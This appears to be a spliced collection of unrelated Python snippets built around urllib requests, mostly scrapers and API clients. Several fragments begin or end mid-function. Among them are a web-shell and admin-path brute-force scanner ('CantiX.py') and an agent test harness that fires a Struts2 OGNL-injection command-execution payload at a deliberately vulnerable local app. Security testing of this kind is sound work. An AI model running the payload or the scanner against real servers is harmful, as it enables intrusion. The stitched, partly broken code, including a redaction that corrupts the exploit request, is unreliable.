    url = 'https://www.bestbuy.com/site/laptop-computers/all-laptops/pcmcat138500050001.c?cp=' + str(
        x) + '&id=pcmcat138500050001&intl=nosplash'
    try:
        req12 = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        page_html12 = uReq(req12).read()
        page_soup12 = soup(page_html12, "html.parser")
        # attrs must be a dict, not a set, for BeautifulSoup class filters
        containers = page_soup12.findAll("div", {"class": "sku-title"})
        for container in containers:
            links = base_url + container.h4.a['href'] + '&intl=nosplash'
            req = Request(links, headers={'User-Agent': 'Mozilla/5.0'})
            page_html = uReq(req).read()
            page_soup = soup(page_html, "html.parser")
            Page_Link.append(links)
            today = date.today()
            Date.append(today)
            Name = page_soup.findAll(
                "h1", {"class": "heading-5 v-fw-regular"})[0].text.replace(",", "|")
            Item_Name.append(Name)
def by_size(words, size):
    return [word for word in words if len(word) > size]

answerFinalList = by_size(answersList, 1)
print(answerFinalList)

# Count how often each answer appears in the search results
url = u"https://www.google.es/search?q=" + questiontext.replace(' ', '+')
print(url)
url = url + "&start=0"
print(url)
unaccented_url = unidecode.unidecode(url)

page = Request(unaccented_url, headers={'User-Agent': 'Mozilla/5.0'})  # so the spider is not detected
webpage = urlopen(page).read()
# find = webpage.find(answerFinalList[1].encode())
counter = [(x, webpage.find(x.encode())) for x in answerFinalList]
print(counter)

# Show the count on screen
if len(counter) == 3:
    print(counter)
    #label = tkinter.Label(text=counter, font=('Times New Roman', '20'), fg='red', bg='white')
    #label.master.overrideredirect(True)
    #label.master.geometry("+1050+250")
    #label.master.lift()
    #label.master.wm_attributes("-topmost", True)
    #label.master.wm_attributes("-disabled", True)
    #label.master.wm_attributes("-transparentcolor", "white")
download_pictures_yn = str(input("Download pictures? (y/n) ")).lower()
if download_pictures_yn in yes:
    filename_pictures = str(input("How should the image files be named? "))
    filepath_pictures = filename_pictures + '/' + filename_pictures

    # sets google url according to input
    google_url = 'https://www.google.ch/search?site=webhp&tbm=isch&source=hp&q=' + search_term + '&oq=' + search_term

    # just checking the search url for mistakes
    print("Checking following URL:\n" + google_url + "\n")

    # adding headers to fool google
    req = Request(
        google_url,
        headers={
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
        })
    soup = BeautifulSoup(urllib.request.urlopen(req), 'html.parser')

    # for debugging and reverse engineering purposes
    #open('souptest1.html', 'w').write(str(soup.encode("utf-8")))
    #open('souptest2.txt', 'w').write(str(soup))

    # find all divs with class rg_meta because that's where the links are
    divs = soup.findAll("div", {"class": "rg_meta"})

    link_counter = 0
    exception_counter = 0
    for div in divs:
def send_request(url, header, body):
    req = Request(url, body.encode('utf-8'), header)
    response = urlopen(req)
    response_str = response.read()
    return response_str
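# Example call to send_request() above with a JSON body; the URL is a placeholder.
body = '{"ping": true}'
header = {'Content-Type': 'application/json'}
print(send_request('http://example.com/api', header, body))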
def update_page_for_platform(command, platform, remote, language):
    page_url = get_page_url(platform, command, remote, language)
    data = urlopen(Request(page_url, headers=REQUEST_HEADERS),
                   context=URLOPEN_CONTEXT).read()
    store_page_to_cache(data, command, platform, language)
def scan(self):
    # argument parser
    parser = argparse.ArgumentParser(
        prog="CantiX.py",
        description="Simple Find Shell in Website")
    parser.add_argument("-u", dest="domain", help="your url")
    parser.add_argument("-w", dest="wordlist", help="your wordlist")
    args = parser.parse_args()
    if not args.domain:
        sys.exit("" + W + "usage: - - ")
    if not args.wordlist:
        sys.exit("" + W + "usage: - - ")

    # handle url website format
    site = args.domain
    print("" + W + "Start Scan!... ")
    print("" + W + "Please wait a moment...")
    time.sleep(3)
    if not site.startswith("http://"):
        site = "http://" + site
    if not site.endswith("/"):
        site = site + "/"

    # load wordlist
    try:
        pathlist = args.wordlist
        wlist = open(pathlist, "r")
        wordlist = wlist.readlines()
    except FileNotFoundError as e:
        print("" + M + " - - ")
        exit()
    finally:
        try:
            wlist.close()
        except:
            print("" + W + "Close - - ")

    # user-agent
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
    # list to hold the results we find
    found = []
    # response codes
    resp_codes = {403: "403 forbidden", 401: "401 unauthorized"}

    # loop over the wordlist, joining each path onto the site url
    starttime = time.time()
    for psx in wordlist:
        try:
            psx = psx.replace("\n", "")
            url = site + psx
            req = Request(url, headers={"User-Agent": user_agent})
            time.sleep(0.1)
            try:
                connection = urlopen(req)
                print("\033[96m[\033[90m{0}\033[96m]".format(time.strftime("%H:%M:%S")),
                      "\033[92mFound :", "\033[0m/" + psx)
                found.append(url)
            except HTTPError as e:
                if e.code == 404:
                    print("\033[96m[\033[90m{0}\033[96m]".format(time.strftime("%H:%M:%S")),
                          "\033[91mError :", "\033[0m/" + psx)
                else:
                    print("\033[96m[\033[90m{0}\033[96m]".format(time.strftime("%H:%M:%S")),
                          "\033[92mInfo :", "\033[33m/" + psx,
                          "\033[92mstatus:\033[33m", resp_codes[e.code])
            except URLError as e:
                sys.exit("\033[31m[!] Oops, check your network connection")
            except Exception as er:
                print("\033[93m[!] \033[0mExit Program")
                time.sleep(3)
                exit()
        except KeyboardInterrupt as e:
            print("" + C + "CTRL+C detected")
            print("\033[96m[!] \033[0mExit Program")
            time.sleep(2)
            exit()

    if found:
        print("" + C + "_::" + H + "Result Found" + C + "::_" + H + " ")
        print("\n".join(found))
        print("\033[96m[?] \033[0mTime Elapsed: \033[35m%.2f\033[0m Seconds"
              % float(time.time() - starttime))
    else:
        print("\n\033[96m[!] \033[0mCould Not Find Any Admin")
        print("\033[96m[?] \033[0mTime Elapsed: \033[33m%.2f\033[0m Seconds"
              % float(time.time() - starttime))
def run(self):
    message = "[INFO]: {} Run!".format(str(datetime.datetime.now()).split('.')[0])
    write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log'))
    repeat = 0
    while True:
        try:
            speech_data = self.__pipe.recv()
        except EOFError as e:
            # There is a bug here that is hard to fix properly; as a workaround,
            # cap the number of consecutive errors and break out of the loop
            # after receiving the error 20 times in a row.
            repeat += 1
            if repeat > 20:
                message = "[ERROR]: {} Nothing received! Out of max repeat times! Break!\n".format(
                    str(datetime.datetime.now()).split('.')[0])
                message += "[ERROR]: {} \n".format(
                    str(datetime.datetime.now()).split('.')[0])
                message += traceback.format_exc()
                write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log'))
                print("[ERROR]: Nothing received! Out of max repeat times! Break!")
                break
            message = "[Warning]: {} Nothing received!".format(
                str(datetime.datetime.now()).split('.')[0])
            write_log(message=message, file_=os.path.join(LOG_DIR, 'warning.log'))
            print("[Warning]: Nothing received!")
            continue
        # reset the counter as soon as data is received again
        repeat = 0
        if speech_data == 'stop':
            break
        length = len(speech_data)
        if length == 0:
            message = "[ERROR]: {} Data length 0 bytes!".format(
                str(datetime.datetime.now()).split('.')[0])
            write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log'))
            print("[ERROR]: Data length 0 bytes!")
            self.__pipe.send([''])
            # for i in range(3):
        else:
            speech = base64.b64encode(speech_data)
            speech = str(speech, 'utf-8')
            params = {
                'dev_pid': self.dev_pid,
                # 'lm_id': LM_ID,  # enable this when testing a self-trained model platform
                'format': self.format,
                'rate': self.rate,
                'token': self.token,
                'cuid': self.cuid,
                'channel': 1,
                'speech': speech,
                'len': length
            }
            post_data = json.dumps(params, sort_keys=False)
            # print(post_data)
            req = Request(self.as_url, post_data.encode('utf-8'))
            req.add_header('Content-Type', 'application/json')
            try:
                f = urlopen(req)
                result_str = f.read()
                message = "[INFO]: {} Request finished!".format(
                    str(datetime.datetime.now()).split('.')[0])
                write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log'))
            except URLError as err:
                result_str = err.reason
                message = "[ERROR]: {} Asr http response reason : {}.".format(
                    str(datetime.datetime.now()).split('.')[0], str(result_str))
                write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log'))
                print('[ERROR] Asr http response reason :', str(result_str))
            result_str = str(result_str, 'utf-8')
            result_str = json.loads(result_str)
            if 'result' in result_str:
                print(result_str['result'])
                self.__pipe.send(result_str['result'])
            else:
                self.__pipe.send([''])
    message = "[INFO]: {} Sr finished!".format(str(datetime.datetime.now()).split('.')[0])
    write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log'))
def get_realtime_quotes(symbols=None):
    """
    Get real-time quotes (real-time trading data),
    used to track trading activity (this run's result minus the previous run's data).

    Parameters
    ------
        symbols : string, array-like object (list, tuple, Series).

    return
    -------
        DataFrame of real-time trading data. Columns:
            0: name, stock name
            1: open, today's opening price
            2: pre_close, yesterday's closing price
            3: price, current price
            4: high, today's high
            5: low, today's low
            6: bid, best bid price ("buy one")
            7: ask, best ask price ("sell one")
            8: volumn, traded volume (maybe you need do volumn/100)
            9: amount, traded amount (CNY)
            10: b1_v, bid-1 volume
            11: b1_p, bid-1 price
            12: b2_v, bid-2 volume
            13: b2_p, bid-2 price
            14: b3_v, bid-3 volume
            15: b3_p, bid-3 price
            16: b4_v, bid-4 volume
            17: b4_p, bid-4 price
            18: b5_v, bid-5 volume
            19: b5_p, bid-5 price
            20: a1_v, ask-1 volume
            21: a1_p, ask-1 price
            ...
            30: date
            31: time
    """
    symbols_list = ''
    if isinstance(symbols, list) or isinstance(symbols, set) or \
            isinstance(symbols, tuple) or isinstance(symbols, pd.Series):
        for code in symbols:
            symbols_list += ct._code_to_symbol(code) + ','
    else:
        symbols_list = ct._code_to_symbol(symbols)

    symbols_list = symbols_list[:-1] if len(symbols_list) > 8 else symbols_list
    request = Request(ct.LIVE_DATA_URL % (ct.P_TYPE['http'], ct.DOMAINS['sinahq'],
                                          _random(), symbols_list))
    text = urlopen(request, timeout=10).read()
    text = text.decode('GBK')
    reg = re.compile(r'\="(.*?)\";')
    data = reg.findall(text)
    regSym = re.compile(r'(?:sh|sz)(.*?)\=')
    syms = regSym.findall(text)
    data_list = []
    syms_list = []
    for index, row in enumerate(data):
        if len(row) > 1:
            data_list.append([astr for astr in row.split(',')])
            syms_list.append(syms[index])
    if len(syms_list) == 0:
        return None
    df = pd.DataFrame(data_list, columns=ct.LIVE_DATA_COLS)
    df = df.drop('s', axis=1)
    df['code'] = syms_list
    ls = [cls for cls in df.columns if '_v' in cls]
    for txt in ls:
        df[txt] = df[txt].map(lambda x: x[:-2])
    return df
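# Hypothetical call to get_realtime_quotes() above; the stock codes are
# examples and the ct constants module is assumed from the surrounding package.
df = get_realtime_quotes(['600848', '000001'])
if df is not None:
    print(df[['code', 'name', 'price']])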
def main():
    h = homebase_dir.HomebaseMock("""
        projectId=PROJECT_ID
        homeBaseUrl=file://OUTPUT_PATH/
        logTo=stderr
        heartBeatIntervalMs=500
        reportIntervalMs=1000
        """)

    subprocess.check_output(['mvn', '-q', 'tomcat7:help'], cwd='java-goof')

    opts_env = os.environ.copy()
    opts_env['MAVEN_OPTS'] = '-javaagent:{}=file://{}'.format(
        path.join(os.getcwd(), 'build/libs/snyk-java-runtime-agent.jar'),
        h.config_path)

    victim = subprocess.Popen(['mvn', 'tomcat7:run'], env=opts_env, cwd='java-goof')
    atexit.register(lambda: victim.kill())

    # (the target URL and the Request construction were redacted at the
    # source; `req` below comes from the redacted span)
    tomcat = 'http://*****:*****@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?("
        "#_memberAccess=#dm):((#container=#context["
        "'com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance("
        "@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear("
        ")).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).("
        "#cmd='pwd').(#cmds={'/bin/bash','-c',#cmd}).(#p=new java.lang.ProcessBuilder(#cmds)).("
        "#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=("
        "@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).("
        "@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    })

    # run the exploit
    with urlopen(req) as _:
        pass

    # wait for an agent report
    sleep(2)
    victim.terminate()
    sleep(1)

    # this segment is purely for documentation generation
    doc_events = dict()
    doc_heartbeat = dict()
    doc_metadata = dict()
    for doc in h.all_seen_docs():
        if 'eventsToSend' in doc:
            print()
            doc_events = doc
            json.dump(doc, sys.stdout)
        if 'heartbeat' in doc:
            print()
            doc_heartbeat = doc
            json.dump(doc, sys.stdout)
        if 'loadedSources' in doc:
            doc_metadata = doc

    print('\n\n>>> events document:')
    json.dump(doc_events, sys.stdout)
    print('\n\n>>> heartbeat document:')
    json.dump(doc_heartbeat, sys.stdout)
    print('\n\n>>> metadata document:')
    json.dump(doc_metadata, sys.stdout)

    success = False
    for event in h.all_seen_events():
        success = success or event['methodEntry']['methodName'].startswith(
            'org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest')

    if not success:
        print('\n\nNo events matched:')
        for event in h.all_seen_events():
            json.dump(event, sys.stdout)
            print()
        sys.exit(4)

    print('\n\nSuccess!')
async def overwatch(self, ctx, name, tag):
    url = f"http://owapi.io/profile/pc/asia/{name}-{tag}"
    req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    webpage = urlopen(req).read()
    output = json.loads(webpage)
    username = output['username']
    level = output['level']
    competitive = output['competitive']
    tanker = output['competitive']['tank']['rank']
    # the original read the tank rank three times; 'damage' and 'support'
    # are assumed to be the API's keys for the other two roles
    dealer = output['competitive']['damage']['rank']
    healer = output['competitive']['support']['rank']
    playtime = output['playtime']
    portrait = output['portrait']
    quickplaytime = output['playtime']['quickplay']
    competitivetime = output['playtime']['competitive']
    won = output['games']['quickplay']['won']
    played = output['games']['quickplay']['played']

    global TankRank
    if 0 <= tanker <= 1499:
        TankRank = "브론즈"
    elif 1500 <= tanker <= 1999:
        TankRank = "실버"
    elif 2000 <= tanker <= 2499:
        TankRank = "골드"
    elif 2500 <= tanker <= 2999:
        TankRank = "플래티넘"
    elif 3000 <= tanker <= 3499:
        TankRank = "다이아몬드"
    elif 3500 <= tanker <= 3999:
        TankRank = "마스터"
    elif 4000 <= tanker <= 5000:
        TankRank = "그랜드마스터"
    elif 5000 <= tanker:
        TankRank = "그랜드마스터 이상"

    global DealRank
    if 0 <= dealer <= 1499:
        DealRank = "브론즈"
    elif 1500 <= dealer <= 1999:
        DealRank = "실버"
    elif 2000 <= dealer <= 2499:
        DealRank = "골드"
    elif 2500 <= dealer <= 2999:
        DealRank = "플래티넘"
    elif 3000 <= dealer <= 3499:
        DealRank = "다이아몬드"
    elif 3500 <= dealer <= 3999:
        DealRank = "마스터"
    elif 4000 <= dealer <= 5000:
        DealRank = "그랜드마스터"
    elif 5000 <= dealer:
        DealRank = "그랜드마스터 이상"

    global HealRank
    if 0 <= healer <= 1499:  # original checked `tanker` here by mistake
        HealRank = "브론즈"
    elif 1500 <= healer <= 1999:
        HealRank = "실버"
    elif 2000 <= healer <= 2499:
        HealRank = "골드"
    elif 2500 <= healer <= 2999:
        HealRank = "플래티넘"
    elif 3000 <= healer <= 3499:
        HealRank = "다이아몬드"
    elif 3500 <= healer <= 3999:
        HealRank = "마스터"
    elif 4000 <= healer <= 5000:
        HealRank = "그랜드마스터"
    elif 5000 <= healer:
        HealRank = "그랜드마스터 이상"

    embed = discord.Embed(title=f'{name}#{tag} 님의 정보',
                          colour=discord.Color.red())
    embed.set_author(name=f'{ctx.author.name}', icon_url=f'{portrait}')
    embed.set_thumbnail(url=ctx.author.avatar_url)
    embed.add_field(name="레벨", value=f'{len(ctx.guild.emojis)}개', inline=False)
    embed.add_field(
        name="경쟁전",
        value=f"탱커 : {tanker} : {TankRank}\n딜러 : {dealer} : {DealRank}\n힐러 : {healer} : {HealRank}",
        inline=False)
    embed.add_field(name="플레이", value=f"{playtime}", inline=False)
    embed.set_footer(text=f"{ctx.author}", icon_url=ctx.author.avatar_url)
# Counting for duplicated misspellings
for rowdata in result.values:
    if rowdata[1] == -1:  # rowdata[1]: duplication
        duplicatedcount = len(result.loc[result['misspelling'] == rowdata[0]])
        result.loc[result['misspelling'] == rowdata[0], 'duplication'] = duplicatedcount
    else:
        continue

# Getting values from Wikipedia
print('\n + Finding words misspelled on Wikipedia')
for rowdata in result.values:
    time.sleep(0.2)
    if rowdata[1] < 3 and rowdata[2] == -1:  # rowdata[2]: wiki
        tu = 'https://en.wikipedia.org/w/index.php?search=' + rowdata[0]
        req = Request(tu)
        req.add_header('User-Agent', useragent)
        targetpage = urlopen(req)
        soup = BeautifulSoup(targetpage, 'lxml')
        if len(soup.findAll(
                'a',
                attrs={'href': re.compile('/wiki/Wikipedia:Articles_for_creation')})) > 0:
            result.loc[result['misspelling'] == rowdata[0], 'wiki'] = False
            #result.loc[result['misspelling'] == rowdata[0], 'wikiurl'] = browser.current_url
            result.loc[result['misspelling'] == rowdata[0],
def get_hist_data(code=None, start=None, end=None, ktype='D',
                  retry_count=3, pause=0.001):
    """
    Get historical trading records for an individual stock.

    Parameters
    ------
        code: string
            stock code, e.g. 600848
        start: string
            start date, format YYYY-MM-DD; if empty, data starts from the
            earliest date the API provides
        end: string
            end date, format YYYY-MM-DD; if empty, data runs to the most
            recent trading day
        ktype: string
            data type: D=daily k-line, W=weekly, M=monthly, 5=5-minute,
            15=15-minute, 30=30-minute, 60=60-minute; default is D
        retry_count : int, default 3
            number of retries when network problems occur
        pause : int, default 0
            seconds to pause between repeated requests, to avoid problems
            caused by requests spaced too closely

    return
    -------
        DataFrame
            columns: date, open, high, close, low, volume, price change,
            pct change, 5/10/20-day mean price, 5/10/20-day mean volume,
            turnover rate
    """
    symbol = ct._code_to_symbol(code)
    url = ''
    if ktype.upper() in ct.K_LABELS:
        url = ct.DAY_PRICE_URL % (ct.P_TYPE['http'], ct.DOMAINS['ifeng'],
                                  ct.K_TYPE[ktype.upper()], symbol)
    elif ktype in ct.K_MIN_LABELS:
        url = ct.DAY_PRICE_MIN_URL % (ct.P_TYPE['http'], ct.DOMAINS['ifeng'],
                                      symbol, ktype)
    else:
        raise TypeError('ktype input error.')

    for _ in range(retry_count):
        time.sleep(pause)
        try:
            request = Request(url)
            lines = urlopen(request, timeout=10).read()
            if len(lines) < 15:  # no data
                return None
        except Exception as e:
            print(e)
        else:
            js = json.loads(lines.decode('utf-8') if ct.PY3 else lines)
            cols = []
            if (code in ct.INDEX_LABELS) & (ktype.upper() in ct.K_LABELS):
                cols = ct.INX_DAY_PRICE_COLUMNS
            else:
                cols = ct.DAY_PRICE_COLUMNS
            if len(js['record'][0]) == 14:
                cols = ct.INX_DAY_PRICE_COLUMNS
            df = pd.DataFrame(js['record'], columns=cols)
            if ktype.upper() in ['D', 'W', 'M']:
                df = df.applymap(lambda x: x.replace(u',', u''))
                df[df == ''] = 0
            for col in cols[1:]:
                df[col] = df[col].astype(float)
            if start is not None:
                df = df[df.date >= start]
            if end is not None:
                df = df[df.date <= end]
            if (code in ct.INDEX_LABELS) & (ktype in ct.K_MIN_LABELS):
                df = df.drop('turnover', axis=1)
            df = df.set_index('date')
            df = df.sort_index(ascending=False)
            return df
    raise IOError(ct.NETWORK_URL_ERROR_MSG)
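# Example call to get_hist_data() above; the code and date range are
# illustrative, and the ct constants module comes from the surrounding package.
df = get_hist_data('600848', start='2015-01-05', end='2015-01-09')
print(df.head())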
def wait(player_response, config):
    # If it hasn't started yet, we wait until a short amount of time before
    # the scheduled start time, and then start polling. This will probably
    # be less disruptive than constantly polling for hours and hours.
    # microformat.playerMicroformatRenderer.liveBroadcastDetails.startTimestamp
    # is less deep in there but would require us to parse an ISO 8601 datetime (oh no)
    scheduled_start = int(
        player_response['playabilityStatus']['liveStreamability']
        ['liveStreamabilityRenderer']['offlineSlate']
        ['liveStreamOfflineSlateRenderer']['scheduledStartTime'])
    total_wait = scheduled_start - time.time()
    log.info(
        f'Stream is scheduled to start at {scheduled_start} (in {timedelta(seconds=total_wait)})'
    )
    if total_wait > POLL_THRESHOLD_SECS:
        long_sleep = total_wait - POLL_THRESHOLD_SECS
        log.info(
            f'Going to sleep for {timedelta(seconds=long_sleep)} before polling'
        )
        time.sleep(long_sleep)

    while True:
        # Use heartbeat endpoint like a real client because of rate limits
        # on get_video_info
        heartbeat_payload = innertube_payload()
        heartbeat_payload.update(HEARTBEAT_FIXED)
        with get_opener() as opener:
            resp = opener.open(
                Request(
                    f"https://www.youtube.com/youtubei/v1/player/heartbeat?alt=json&key={INNERTUBE_API_KEY}",
                    data=json.dumps(heartbeat_payload).encode('utf-8'),
                    headers={
                        "Content-Type": 'application/json',
                        "Host": "www.youtube.com",
                        'User-Agent': INNOCUOUS_UA.format(
                            version=get_current_firefox_version()),
                    },
                ))
            heartbeat = json.loads(resp.read().decode('utf-8'))

        if 'offlineSlate' in heartbeat['playabilityStatus'][
                'liveStreamability']['liveStreamabilityRenderer']:
            scheduled_start = int(
                heartbeat['playabilityStatus']['liveStreamability']
                ['liveStreamabilityRenderer']['offlineSlate']
                ['liveStreamOfflineSlateRenderer']['scheduledStartTime'])
            total_wait = scheduled_start - time.time()
            if total_wait > config['ignore_wait_greater_than_s']:
                log.info(
                    f"{player_response['videoDetails']['videoId']} starts too far in the future, at {scheduled_start} (in {timedelta(seconds=total_wait)})"
                )
                sys.exit(1)
            elif total_wait < -config['ignore_past_scheduled_start_greater_than_s']:
                log.info(
                    f"{player_response['videoDetails']['videoId']} starts too far in the past, at {scheduled_start} ({timedelta(seconds=-total_wait)} ago)"
                )
                sys.exit(1)

        status = heartbeat['playabilityStatus']['status']
        if status == 'OK':
            log.info('Video is no longer upcoming, time to go')
            return
        elif status == 'UNPLAYABLE':
            log.info(
                f'Video not playable: {heartbeat["playabilityStatus"]}, giving up'
            )
            sys.exit(1)
        elif status == 'LIVE_STREAM_OFFLINE':
            poll_delay = int(
                heartbeat['playabilityStatus']['liveStreamability']
                ['liveStreamabilityRenderer']['pollDelayMs']) / 1000.0
            log.info(f'Still offline, will sleep {poll_delay}s')
            time.sleep(poll_delay)
        else:
            raise NotImplementedError(
                f"Don't know what to do with playability status {status}: {heartbeat['playabilityStatus']}"
            )

    # Should be unreachable...?
    return
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup
import re

site = 'https://www.hltv.org/results?team=4773'
hdr = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'
}
req = Request(site, headers=hdr)
html = urlopen(req)
bs = BeautifulSoup(html, 'html.parser')
print(bs)

# We need to grab the 100 most recent matches and save them....
link_list = []
for link in bs.find_all('a', {'class': 'a-reset'}):
    if 'href' in link.attrs:
        link_list.append(link.attrs['href'])

with open('temp_links.txt', 'w') as f:
    f.write(str(link_list))
import re
import requests
import requests_html
# Download and convert YT video
import youtube_dl
# Get last song downloaded / delete last song/video
import shutil
import glob
import os
import sys
# Telegram Bot
import telebot
from telegram.ext import Updater
from telegram.ext import CommandHandler
# Get user settings
import json
from urllib.request import Request, urlopen  # needed for the request below
from fake_useragent import UserAgent

ua = UserAgent()
header = {'User-Agent': str(ua.chrome)}

ytmreq = Request(
    "https://music.youtube.com/watch?v=I5V7igjZlVI&list=RDAMVMI5V7igjZlVI",
    headers=header)
webpage1 = urlopen(ytmreq).read().decode()
print(webpage1)
# copertina = cover art
searchname = re.compile(
    '<img id="img" class="style-scope yt-img-shadow" alt="" width="1048" src="https://lh3.googleusercontent.com/C1kJNdZQdjxxXJzUTrvd2w0YQGkCf1yxPWMy8IuMyxzSQJPBax6qcYkS2XSc0gs8u_WLuix0d6IJqiHF=w544-h544-l90-rj">',
    re.IGNORECASE | re.DOTALL)
copertina = re.findall(searchname, webpage1)
print(copertina)
import json
from urllib.request import urlopen, Request
import ssl

ssl._create_default_https_context = ssl._create_unverified_context

req = Request("https://pokeapi.co/api/v2/", headers={'User-Agent': 'XYZ/3.0'})
webpage = urlopen(req).read()
data = json.loads(webpage)
# print(json.dumps(data, indent=2))
print(len(data))
def get_invite_from_code(code):
    """Fetch the invite object given just its code.

    Args:
        code (str): The invite code, unique to the invitation

    Returns:
        A tuple of three values. The first is a bool that indicates whether
        or not we successfully fetched the invite object. The second is a
        bool that is True if we did not successfully fetch the invite object
        but this may be a temporary issue, and False in all other situations.
        The third is a dictionary of the fetched invite object, if
        successful, and None in other cases.

        Example Invite Object:
        {
            "code": "0vCdhLbwjZZTWZLD",
            "guild": {
                "id": "165176875973476352",
                "name": "CS:GO Fraggers Only",
                "splash": null,
                "icon": null,
                "features": {}
            },
            "channel": {
                "id": "165176875973476352",
                "name": "illuminati",
                "type": 0
            }
        }
    """
    global API_BASE
    global USER_AGENT

    req = Request(f'{API_BASE}invites/{code}')
    req.add_header('Accept', 'application/json')
    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req.add_header('User-Agent', USER_AGENT)

    try:
        with urlopen(req) as res:
            data = json.loads(res.read().decode('utf-8'))
            if data['code'] == '10006':
                # This is a special code to indicate the link just expired
                return False, False, None
            return True, False, data
    except HTTPError as err:
        if err.code == 404:
            return False, False, None
        if err.code == 429:
            if 'X-RateLimit-Reset' in err.headers:
                # header values arrive as strings, so convert before the math
                reset_time = float(err.headers['X-RateLimit-Reset'])
                time_to_wait = math.ceil(reset_time - time.time())
                if time_to_wait <= 0:
                    print(f'got ratelimited when checking {code} but the reset time is in the past, trying again')
                    return False, True, None
                print(f'got ratelimited when checking {code}, need to wait {time_to_wait} seconds before trying again')
                time.sleep(time_to_wait)
            return False, True, None
        print(f'Got error code {err.code} in HTTPResponse for code {code}')
        return False, True, None
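# Hypothetical retry loop around get_invite_from_code() above; the invite code
# is the placeholder from the docstring example.
ok, retry, invite = get_invite_from_code('0vCdhLbwjZZTWZLD')
while not ok and retry:
    ok, retry, invite = get_invite_from_code('0vCdhLbwjZZTWZLD')
if ok:
    print(invite['guild']['name'])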
def get_weather():
    #fun_name, location, date = Dialogflow_Text[0], Dialogflow_Text[1], Dialogflow_Text[2]
    # if no location was spoken, fall back to the user's home address
    #if location == '내위치':
    #    f = open("/home/pi/robot109/data/user_info.txt", 'r')
    #    location = f["address"]
    with open('/home/pi/robot109/data/user_info.txt', 'r') as inf:
        location = eval(inf.read())["address"][2:-1].split(" ")[0]
    print(location)

    # enc_location: the location the user asked about
    enc_location = urllib.parse.quote(location + '+날씨')
    # search the weather for enc_location
    url = 'https://search.naver.com/search.naver?ie=utf8&query=' + enc_location

    req = Request(url)
    page = urlopen(req)
    html = page.read()
    soup = bs4.BeautifulSoup(html, 'html5lib')
    soup.find('p', class_='info_temperature').find('span', class_='todaytemp').text
    date = "오늘"
    if date == '오늘':
        # current temperature
        NowTemp = soup.find('span', {'class': 'todaytemp'}).text
        # weather summary
        WeatherCast = soup.find('p', {'class': 'cast_txt'}).text
        # today's morning, afternoon and feels-like temperatures
        TodayMorningTemp = soup.find('span', {'class': 'min'}).text[:-1]
        TodayAfternoonTemp = soup.find('span', {'class': 'max'}).text[:-1]
        TodayFeelTemp = soup.find('span', {'class': 'sensible'}).text[5:-1]
        # UV index
        TodayUV = soup.find('span', {'class': 'indicator'}).text[4:-2] + " " + \
            soup.find('span', {'class': 'indicator'}).text[-2:]
        # fine dust, ultra-fine dust and ozone indexes
        CheckDust1 = soup.find('div', {'class': 'sub_info'})
        CheckDust2 = CheckDust1.find('div', {'class': 'detail_box'})
        CheckDust = []
        for i in CheckDust2.select('dd'):
            CheckDust.append(i.text)
        FineDust = CheckDust[0][:-2] + " " + CheckDust[0][-2:]
        UltraFineDust = CheckDust[1][:-2] + " " + CheckDust[1][-2:]
        Ozon = CheckDust[2][:-2] + " " + CheckDust[2][-2:]

        text_Temp = '오늘 ' + location + ' 오전 기온은 ' + TodayMorningTemp + '도' + \
            ', 오후 기온은 ' + TodayAfternoonTemp + '도 입니다'
        if float(TodayFeelTemp) < 29:
            text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도입니다'
        elif 29 <= float(TodayFeelTemp) < 31:
            text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 더운 날씨에요, 할아버지 야외 활동을 자제해주세요'
        elif 31 <= float(TodayFeelTemp) < 37:
            text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 무더운 날씨에요, 할아버지 에어컨을 켜주세요.'
        elif 37 <= float(TodayFeelTemp):
            text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 폭염이에요, 할아버지 야외 활동을 자제하고 꼭 에어컨을 켜주세요'
        with open('/home/pi/robot109/data/weather.txt', 'w') as inf:
            inf.write(text_Temp + ". " + text_feel_temp)
        return text_Temp + ". " + text_feel_temp
    elif date == '내일':
        # check tomorrow's morning/afternoon temperatures and conditions
        tomorrowArea = soup.find('div', {'class': 'tomorrow_area'})
        tomorrowCheck = tomorrowArea.find_all('div', {'class': 'main_info morning_box'})
        # tomorrow morning temperature
        tomorrowMoring = tomorrowCheck[0].find('span', {'class': 'todaytemp'}).text
        # tomorrow morning conditions
        tomorrowMState1 = tomorrowCheck[0].find('div', {'class': 'info_data'})
        tomorrowMState2 = tomorrowMState1.find('ul', {'class': 'info_list'})
        tomorrowMState3 = tomorrowMState2.find('p', {'class': 'cast_txt'}).text
        tomorrowMState4 = tomorrowMState2.find('div', {'class': 'detail_box'})
        tomorrowMState5 = tomorrowMState4.find('span').text.strip()
        tomorrowMState = tomorrowMState3 + " " + tomorrowMState5
        # tomorrow afternoon temperature
        tomorrowAfter_info = tomorrowCheck[1].find('p', {'class': 'info_temperature'})
        tomorrowAfter = tomorrowAfter_info.find('span', {'class': 'todaytemp'}).text
        # tomorrow afternoon conditions
